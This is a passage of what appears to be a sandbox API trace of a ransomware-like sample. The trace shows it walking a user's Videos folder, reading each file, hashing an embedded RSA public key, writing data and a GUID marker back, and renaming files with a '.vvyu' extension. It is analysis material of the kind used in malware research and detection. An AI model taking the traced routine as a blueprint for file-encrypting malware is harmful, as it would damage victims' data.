(HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a210 [0195.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0195.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0195.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0195.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1e0 [0195.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0195.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0195.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0195.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0195.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0195.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0195.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc98 | out: hHeap=0x6a0000) returned 1 [0195.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.963] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0x16a97, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0x16a97, lpOverlapped=0x0) returned 1 [0195.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0195.966] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x16a9c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.966] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.969] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.970] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.970] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.970] CloseHandle (hObject=0x52c) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0195.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8d0) returned 0x2d2dc80 [0195.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0195.973] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\m5lKRrHOPGPv2jhgTq-.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\m5lkrrhopgpv2jhgtq-.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\m5lKRrHOPGPv2jhgTq-.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\m5lkrrhopgpv2jhgtq-.flv.vvyu")) returned 1 [0195.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0195.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.975] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0195.982] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f60100, ftCreationTime.dwHighDateTime=0x1d8a552, ftLastAccessTime.dwLowDateTime=0x88003590, ftLastAccessTime.dwHighDateTime=0x1d8a735, ftLastWriteTime.dwLowDateTime=0x88003590, ftLastWriteTime.dwHighDateTime=0x1d8a735, nFileSizeHigh=0x0, nFileSizeLow=0xe58a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zwQUu_BYs.swf", cAlternateFileName="ZWQUU_~1.SWF")) returned 1 [0195.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0195.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.983] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\zwQUu_BYs.swf") returned=".swf" [0195.983] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\zwQUu_BYs.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\zwquu_bys.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.983] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=58762) returned 1 [0195.983] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.986] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xe564, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.986] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.988] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.988] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xe58a, lpOverlapped=0x0) returned 1 [0195.989] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.989] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.989] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.989] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0195.990] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.990] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.990] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.990] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.990] GetLastError () returned 0x0 [0195.990] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.990] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0195.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.991] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.991] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.991] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe590) returned 0x2d4b778 [0195.991] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cc98 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1b0 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cce0 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1c8 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1f8 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a258 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a210 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.993] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0195.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0195.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a258 [0195.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0195.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a210 [0195.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a1f8 [0195.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0195.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0195.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0195.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0195.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.996] GetCurrentThreadId () returned 0x264 [0195.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46fc0 [0195.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0195.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.996] GetCurrentThreadId () returned 0x264 [0195.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a258 [0195.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.998] RtlAllocateHeap 